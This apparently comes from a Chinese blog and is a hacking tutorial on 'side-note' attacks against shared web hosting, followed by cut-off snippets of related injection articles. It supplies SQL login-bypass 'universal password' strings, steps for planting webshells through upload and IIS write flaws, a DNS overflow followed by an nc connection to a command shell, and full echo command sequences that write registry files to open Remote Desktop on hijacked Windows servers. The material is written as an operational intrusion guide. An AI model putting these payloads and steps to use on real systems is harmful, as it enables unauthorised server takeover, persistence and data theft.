37 注入篇 旁註

2021-08-16 16:08:37 字數 3602 閱讀 5024

旁註是網際網路黑客入侵常見的一種手段,多數用來攻擊虛擬主機。其原理是利用統一主機上其他站點的安全漏洞獲取伺服器上的乙個webshell,從而獲得一定的操作許可權,進而利用虛擬目錄許可權的配置不嚴格或者通過「提權」來獲取管理員許可權後在跳轉到目標**的web虛擬目錄中。

由於現在網際網路的發展,使更多的人都擁有自己的**。但是如果自己買伺服器,買頻寬的話就會花費很多錢,這樣長久下去的資金開銷不是一般人可以付的起的。所以虛擬機器出現了,可以使用一台伺服器同時可以搭建多個**站,這就是現在的伺服器合租。雖然便宜了,但是安全性下降了。

比如我們要入侵的**是a,但是它的安全做的相當的好。比如說,全部採用靜態的頁面,後台也找不到。這時就應該想到旁註。通過利用工具來查詢這個**的ip所繫結的網域名稱。如明小子,啊d等。如果這個**繫結的網域名稱越多,那麼它的安全性也就越低。比如經過我們查詢,a的站點所在的ip所繫結的網域名稱有100多個,那麼現在我們可以利用明小子的批量掃瞄。先掃他的上傳頁面。(如果乙個**返回的上傳頁面有n多,那麼很有可能全是假的,後台也同樣)掃到上傳頁面之後,看看存在上傳漏洞嗎?如果存在,就利用相應的工具去搞webshell。還有我們也可以掃後台,如果他的後台沒有驗證碼的話,很有可能可以利用萬能密碼(乙個可以連線sql的語名句.可以直接進入後台)進入,下面給大家幾個萬能密碼:

admin'or'1'='1'--

』or』=』or』

』or』』=』

" or "a"="a

』) or (』a』=』a

or 1=1-- 』

or 』a』=』a

(1)在區域網中的入侵,我們必須拿到一台伺服器的administrator的許可權,然後利用cain來進行sniffer和arp,來搞我們想要的站點。

a、最好的拿webshell的方法就是那個iis寫許可權漏洞。利用掃瞄軟體掃瞄存在漏洞的主機,然後用老兵的利用工具,先put再move,如果成功那麼就拿到了乙個webshell(可以用一句話,然後用客戶端連線)。

(2)利用dns溢位。

首先,掃瞄我們要入侵那個站的的d段ip,也就是在同一內網裡的。掃瞄的埠是53。利用工具去溢位。然後用nc連線所提示的埠。到此我們就獲得了個cmdshell。然後是加使用者或傳木馬。這裡我給出2000和2003的開3389的方法。

2000開3389之後,必須重起才能生效。這裡給出開3389的方法,自己想辦法重起。

在cmd下輸入:

echo windows registry editor version 5.00 >3389.reg

echo. >>3389.reg

echo [hkey_local_machine\software\microsoft\windows\currentversion\netcache] >>3389.reg

echo "enabled"="0" >>3389.reg

echo [hkey_local_machine\software\microsoft\windows nt\currentversion\winlogon] >>3389.reg

echo "shutdownwithoutlogon"="0" >>3389.reg

echo [hkey_local_machine\software\policies\microsoft\windows\installer] >>3389.reg

echo "enableadmintsremote"=dword:00000001 >>3389.reg

echo [hkey_local_machine\system\currentcontrolset\control\terminal server] >>3389.reg

echo "tsenabled"=dword:00000001 >>3389.reg

echo [hkey_local_machine\system\currentcontrolset\services\termdd] >>3389.reg

echo "start"=dword:00000002 >>3389.reg

echo [hkey_local_machine\system\currentcontrolset\services\termservice] >>3389.reg

echo "start"=dword:00000002 >>3389.reg

echo [hkey_users\.default\keyboard layout\toggle] >>3389.reg

echo "hotkey"="1" >>3389.reg

echo [hkey_local_machine\system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp] >>3389.reg

echo "portnumber"=dword:00000d3d >>3389.reg

echo [hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp] >>3389.reg

echo "portnumber"=dword:00000d3d >>3389.reg

下面我再來介紹2003下開3389的方法:

echo windows registry editor version 5.00 >3389.reg

echo. >>3389.reg

echo [hkey_local_machine\system\currentcontrolset\control\terminal server] >>3389.reg

echo "fdenytsconnections"=dword:00000000 >>3389.reg

echo [hkey_local_machine\system\currentcontrolset\control\terminal server\wds\rdpwd\tds\tcp] >>3389.reg

echo "portnumber"=dword:00000d3d >>3389.reg

echo [hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp] >>3389.reg

echo "portnumber"=dword:00000d3d >>3389.reg

2003開3389不用重起。以上的方法來自網路,我沒有測試。如果不行,也可以用開3389的工具。(以上兩種方法要在dos下,用登錄檔編輯器匯入)

如果開啟了3389,並且成功的連線上去,我們可以用cain來arp和sniffer

先用掃瞄工具掃瞄1433這個埠,然後用x-scan來掃瞄剛才掃出來的結果,只掃瞄mssql那一向。如果是sa並且沒有刪除cmd擴充套件的話。我們可以像上面那樣入侵主機。

還有一種方法,掃瞄開放21埠的主機。如果存在的是最高許可權的弱口令,我們可以想上面一樣。如果許可權低的話,就先上傳個webshell,然後提權。

關於提權

關於提權的文章太多了,我就懶得寫了,所以就從網上轉了一篇。

注入篇 XML注入

xml是the extensible markup language 可擴充套件標識語言 的簡寫。xml最初設計的目的是彌補html的不足,後來逐漸用於網路資料的轉換和描述。xml的設計宗旨是傳輸資料,而非顯示資料。目前,xml在web中的應用已經非常廣泛。下面舉乙個簡單的xml例項 1.0 enc...

33 注入篇 寬位元組注入

在注入時通常會使用單引號 雙引號等特殊字元。在應用中,通常為了安全,開發者會開啟php的magic quotes gpc,或者是addslashes mysql real escape string等函式對客戶端傳染到的引數沒有進行過濾,則注入的單引號或雙引號就會被 轉義,但是,如果伺服器端的資料庫...

新手 SQL注入篇 Access注入

開局絮叨 幾經波折,開始靜下心來學習。並且申請了知乎專欄,做一些日常學習整理的筆記和一些技巧。留給未來的我,和懂的欣賞的人閱讀。做筆記的確是個好習慣,因為在全世界上萬人中也就有其中那麼些少數人能擁有過目不忘的本領。加油!路還長。0x1 sql注入篇 access注入 當初接觸這個坑的時候就是從注入 ...